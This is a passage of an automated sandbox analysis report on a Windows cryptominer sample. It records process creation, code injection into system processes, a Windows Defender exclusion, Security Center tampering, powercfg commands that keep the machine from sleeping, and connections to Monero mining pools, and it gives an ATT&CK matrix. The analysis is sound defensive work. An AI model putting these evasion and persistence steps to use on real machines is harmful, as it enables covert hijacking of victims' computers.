          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\System32\dialer.exeCode function: 41_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140001B54
          Source: C:\Windows\System32\dasHost.exeCode function: 131_2_0000028092387960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,131_2_0000028092387960
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Changes security center settings (notifications, updates, antivirus, firewall)
          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: svchost.exe, 0000000E.00000002.2581385774.0000023A06502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
          Source: svchost.exe, 0000000E.00000002.2581385774.0000023A06502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000070.00000003.1940878318.00000177815FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2767734207.00000177811EA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2708670395.000001778094D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2691821114.00000177808D7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2654194377.000001778081B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2810112985.00000177815F9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts41
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API          		11
          Windows Service          		1
          Access Token Manipulation          		1
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution          		Logon Script (Windows)11
          Windows Service          		1
          DLL Side-Loading          		Security Account Manager56
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell          		Login Hook713
          Process Injection          		1
          File Deletion          		NTDS381
          Security Software Discovery          		Distributed Component Object ModelInput Capture1
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
          Masquerading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
          Virtualization/Sandbox Evasion          		Cached Domain Credentials161
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job713
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Rundll32          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1408951 Sample: MDE_File_Sample_c7859a06708... Startdate: 14/03/2024 Architecture: WINDOWS Score: 100 88 monerooceans.stream 2->88 90 gulf.moneroocean.stream 2->90 106 Snort IDS alert for network traffic 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 Yara detected Xmrig cryptocurrency miner 2->110 112 6 other signatures 2->112 10 jnxsifnrdetl.exe 2->10         started        14 Setup.exe 2->14         started        16 svchost.exe 2->16         started        18 8 other processes 2->18 signatures3 process4 dnsIp5 86 C:\Windows\Temp\sidneyeifgjd.sys, PE32+ 10->86 dropped 142 Antivirus detection for dropped file 10->142 144 Multi AV Scanner detection for dropped file 10->144 146 Protects its processes via BreakOnTermination flag 10->146 158 3 other signatures 10->158 21 dialer.exe 10->21         started        24 dialer.exe 10->24         started        27 cmd.exe 10->27         started        33 11 other processes 10->33 148 Suspicious powershell command line found 14->148 150 Uses powercfg.exe to modify the power settings 14->150 152 Adds a directory exclusion to Windows Defender 14->152 29 powershell.exe 8 14->29         started        154 Changes security center settings (notifications, updates, antivirus, firewall) 16->154 31 MpCmdRun.exe 16->31         started        92 127.0.0.1 unknown unknown 18->92 156 Query firmware table information (likely to detect VMs) 18->156 file6 signatures7 process8 dnsIp9 114 Injects code into the Windows Explorer (explorer.exe) 21->114 116 Writes to foreign memory regions 21->116 118 Allocates memory in foreign processes 21->118 126 2 other signatures 21->126 35 svchost.exe 21->35 injected 38 svchost.exe 21->38 injected 50 54 other processes 21->50 102 monerooceans.stream 44.196.193.227, 10128, 49704 AMAZON-AESUS United States 24->102 120 Query firmware table information (likely to detect VMs) 24->120 122 Found strings related to Crypto-Mining 24->122 52 2 other processes 27->52 40 Setup.exe 1 2 29->40         started        44 conhost.exe 29->44         started        46 conhost.exe 31->46         started        48 conhost.exe 33->48         started        54 9 other processes 33->54 signatures10 124 Detected Stratum mining protocol 102->124 process11 dnsIp12 94 192.168.2.14 unknown unknown 35->94 96 192.168.2.13 unknown unknown 35->96 98 192.168.2.23 unknown unknown 35->98 100 72.21.81.240, 49696, 49697, 80 EDGECASTUS United States 38->100 84 C:\ProgramData\...\jnxsifnrdetl.exe, PE32+ 40->84 dropped 136 Modifies the context of a thread in another process (thread injection) 40->136 138 Adds a directory exclusion to Windows Defender 40->138 140 Modifies power options to not sleep / hibernate 40->140 56 dialer.exe 1 40->56         started        59 cmd.exe 1 40->59         started        61 powershell.exe 9 40->61         started        63 13 other processes 40->63 file13 signatures14 process15 signatures16 128 Contains functionality to inject code into remote processes 56->128 130 Writes to foreign memory regions 56->130 132 Allocates memory in foreign processes 56->132 134 3 other signatures 56->134 65 lsass.exe 56->65 injected 80 3 other processes 56->80 68 conhost.exe 59->68         started        70 wusa.exe 59->70         started        72 conhost.exe 61->72         started        74 conhost.exe 63->74         started        76 conhost.exe 63->76         started        78 conhost.exe 63->78         started        82 10 other processes 63->82 process17 signatures18 104 Writes to foreign memory regions 65->104

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe100%AviraTR/AD.Nekark.ziece
          C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe96%ReversingLabsWin64.Trojan.Nekark
          C:\Windows\Temp\sidneyeifgjd.sys5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://dynamic.t0%URL Reputationsafe
          https://xmrig.com/docs/algorithms0%URL Reputationsafe
          https://172.94.1q0%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          http://schemas.microsoft.co0%Avira URL Cloudsafe
          https://excel.office.comSRD1%0%Avira URL Cloudsafe
          https://powerpoint.office.comSRD130%Avira URL Cloudsafe
          https://outlook.comSRD1-0%Avira URL Cloudsafe
          https://powerpoint.office.comN0%Avira URL Cloudsafe
          https://word.office.comSRD1#0%Avira URL Cloudsafe
          http://ctldl.w0%Avira URL Cloudsafe
          http://www.bingmapsportal.comc0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          monerooceans.stream
          		44.196.193.227
          		truetrue
            		unknown
            gulf.moneroocean.stream
            		unknown
            		unknownfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://login.windows.net/common/oauth2/authorizedOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://login.windows.net/common/oauth2/authorizeolsOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://outlook.office365.com/api/v1.0/me/ActivitiesOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://login.windows.net/common/oauth2/authorizetos8OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://login.windows.net/common/oauth2/authorizeationOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://excel.office.comsvchost.exe, 0000006B.00000000.1592264170.00000184E25FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000002.2709297650.00000184E25FD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1604978379.00000184E2C40000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://g.live.com/odclientsettings/ProdV2C:svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://standards.iso.org/iso/19770/-2/2009/schema.xsdsvchost.exe, 0000000C.00000002.2617581393.000001560191C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2549220187.0000015601085000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371073026.0000022ADE675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370267523.0000022ADE65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370421200.0000022ADE668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370002682.0000022ADE671000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000031.00000000.1407435054.000001BA8DA4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2630628617.000001BA8DA4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000006.00000002.1371017605.0000022ADE647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://excel.office.comSRD1%svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.bingmapsportal.comcsvchost.exe, 00000006.00000002.1370890183.0000022ADE613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://wns2-ch1p.notify.windows.com/?token=AwYAAAAYHqKf08ZPoZ860Y%2foGt%2fNxdm9wovwzD08hc8iwriUJ1DWsvchost.exe, 00000058.00000000.1519460664.000002AB7DE12000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://login.windows.net/common/oauth2/authorizegerOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://powerpoint.office.comNsvchost.exe, 0000006B.00000000.1599616250.00000184E28CD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://login.windows.net/common/oauth2/authorizeoxy2OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000031.00000000.1407435054.000001BA8DA4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000031.00000002.2630628617.000001BA8DA4F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.microsoft.coOfficeClickToRun.exe, 00000074.00000000.1742941039.000001570E118000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370267523.0000022ADE65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370421200.0000022ADE668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://login.windows.net/common/oauth2/authorizedtyOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://g.live.com/odclientsettings/Prodsvchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000031.00000000.1407322100.000001BA8DA2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://login.windows.net/common/oauth2/authorizeniesOfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
